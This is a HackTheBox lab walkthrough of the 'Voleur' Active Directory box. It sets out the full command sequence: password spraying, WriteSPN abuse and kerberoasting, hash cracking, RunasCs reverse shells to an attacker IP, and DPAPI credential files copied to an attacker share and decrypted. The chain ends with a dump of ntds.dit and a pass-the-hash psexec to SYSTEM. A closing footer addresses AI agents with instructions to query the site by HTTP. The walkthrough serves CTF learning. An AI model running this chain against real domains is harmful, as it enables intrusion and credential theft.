# Voleur – HackTheBox Walkthrough
**Assume Breach Scenario:**
As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: `ryan.naylor / HollowOct31Nyt`
### Scanning
```
nmap -p- -vvv --min-rate 1000 10.129.232.130
```
* 53 (DNS)
* 88 (Kerberos)
* 135 (RPC)
* 139, 445 (SMB)
* 464 (Kerberos password change)
* 636 (LDAPS)
* 3268, 3269 (Global Catalog)
* 5985 (WinRM)
This strongly suggests an **Active Directory environment**.
Before we dive deep into machine let's do Host Configuration
```
└─$ nxc smb 10.129.232.130 --generate-host host
10.129.232.130 DC.voleur.htb voleur.htb DC
```
### Authentication Check
Since we have the creds let's verify on port SMB , OR LDAP
```
nxc smb 10.129.232.130 -u ryan.naylor -p HollowOct31Nyt
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
```
➡ NTLM is disabled → must use **Kerberos authentication**
### Kerberos Authentication
```
nxc smb 10.129.232.130 -u ryan.naylor -p HollowOct31Nyt -k
```
### Enumerating Shares
```
nxc smb 10.129.232.130 -u ryan.naylor -p HollowOct31Nyt -k --shares
```
Share
Access
Finance
No access
HR
No access
IT
Read
```
impacket-getTGT voleur.htb/ryan.naylor:HollowOct31Nyt -dc-ip 10.129.232.130
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient voleur.htb/ryan.naylor@dc.voleur.htb -k -no-pass
```
```
get Access_Review.xlsx
```
### Cracking xlsx with office2john
```
office2john Access_Review.xlsx > Access_Review.xlsx.hash
john Access_Review.xlsx.hash -w=/usr/share/wordlists/rockyou.txt
```
Looking into xlsx file we have some usernames and password as well Extracted **usernames and password**
### Enumerating Users
* Add usernames that we found above in xlsx file and that is not we got during smb enum
```
nxc smb 10.129.232.130 -u ryan.naylor -p HollowOct31Nyt -k --users-export usernames
```
### Password Spray
```
nxc ldap ip -u usernames -p pass -k --continue-on-success
```
Valid Credentials Found
```
svc_iis:N5pXyW1VqM7CZ8
svc_ldap:M1XyC9pW7qT5Vn
```
`todd.wolfe` returned `KDC_ERR_C_PRINCIPAL_UNKNOWN`\
➡ Likely **deleted account**
### Bloodhound Data Collection
```
nxc ldap dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k --bloodhound --collection all --dns-server 10.129.232.130
```
Looking at the bloodhound outbound of the user `svc_ldap` has **WriteSPN** over `svc_winrm`
### ACL Abuse → Kerberoasting
```
bloodyAD -d voleur.htb -k --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn set object svc_winrm servicePrincipalName -v 'http/l1nuxkid'
[+] svc_winrm's servicePrincipalName has been updated
```
Now we can do kerberoasting
```
nxc ldap dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k --kerberoasting svc_winrm.hash
```
### Cracking Service hash
```
hashcat svc_winrm.hash /usr/share/wordlists/rockyou.txt
```
```
svc_winrm : AFireInsidedeOzarctica980219afi
```
### Shell as svc\_winrm
```
impacket-getTGT voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi -dc-ip 10.129.232.130
export KRB5CCNAME=svc_winrm.ccache
```
```
evil-winrm -i dc.voleur.htb -r voleur.htb
```
### Recycle Bin
```
cmd /c dir /A
Volume in drive C has no label.
Volume Serial Number is A5C3-6454
Directory of C:\
01/30/2025 04:39 AM $Recycle.Bin
```
```
Get-ADOptionalFeature 'Recycle Bin Feature'
```
I am cureently logged in as svc\_winrm but as we saw in bloodhound svc\_ldap is member of restore\_users group so i think to see the deleted user or enumerate we have to logged in as that user
### Switch to svc\_ldap or Shell as svc\_ldap
Using runascs.exe
```
./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn powershell -r 10.10.15.194:135
```
### Restore Deleted User
```
Get-ADObject -Filter 'isDeleted -eq $true -and ObjectClass -eq "user"' -IncludeDeletedObjects | ft Name, DistinguishedName
```
```
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
```
```
Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
```
Now we recoved this user remember we found the todd.wolfe's password in xlsx file? but that time we got some unknown error now we have user
### Shell as todd.wolfe
```
nxc smb dc.voleur.htb -u todd.wolfe -p NightT1meP1dg3on14 -k
```
Now todd.wolfe don't have winrm but we can use the same runascs.exe
```
./RunasCs.exe todd.wolfe NightT1meP1dg3on14 powershell -r 10.10.15.194:139
```
There’s a folder in the `C:\IT` that I can now access: and it It has a `todd.wolfe` directory:
No useful visible files but looking at DPAPI master key it's there
### DPAPI Decryption
There was nothing of interest in the non-hidden directories. However, a stored credential was found in the `AppData` directory.
```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> ls AppData\Roaming\Microsoft\Credentials
```
The common location for DPAPI master keys
```bash
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
```
Found the master key
```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> ls AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110
```
Transfer
```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> copy AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3 \\10.10.15.194\share
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> copy AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88 \\10.10.15.194\share
```
* Decrypt
```
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
```
```
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
```
### Shell as jaremy
At this stage, `jeremy.combs` was identified as a member of the **Third-Line Technicians** group.
```
impacket-getTGT voleur.htb/jeremy.combs:'qT3V9pLXyN7W4m' -dc-ip 10.129.32.134
export KRB5CCNAME=jeremy.combs.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
```
We then revisited the open ports and noticed that port `2222` was running SSH on Ubuntu. Additionally, an `id_rsa` file was discovered.
```
*Evil-WinRM* PS C:\IT\Third-Line Support> dir
Directory: C:\IT\Third-Line Support
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2025 8:11 AM Backups
-a---- 1/30/2025 8:10 AM 2602 id_rsa
-a---- 1/30/2025 8:07 AM 186 Note.txt.txt
```
```
*Evil-WinRM* PS C:\IT\Third-Line Support> type n*
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
```
The `id_rsa` key did not work for the `jaremy` user, but it successfully authenticated as the `svc_backup` user.
Although there was not much of interest in the current directory, the `C:` drive was mounted under `/mnt`.
From there, access to the `Backups` directory was possible a directory that `jeremy.combs` could not previously access.
```
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls
'Active Directory' registry
```
The backup directory contained the following sensitive files:
* `SECURITY`
* `SYSTEM`
* `ntds.dit`
### Dumping the Hashes
```
$ secretsdump.py LOCAL -system SYSTEM -security SECURITY -ntds ntds.dit
```
### Shell as `NT AUTHORITY\SYSTEM`
Using the dumped Administrator hash, a shell was obtained as `NT AUTHORITY\SYSTEM` with the psexec below command:
```
psexec.py voleur.htb/administrator@dc.voleur.htb -no-pass -hashes :e656e07c56d831611b577b160b259ad2 -k
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hackthebox/voleur-hackthebox-walkthrough.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.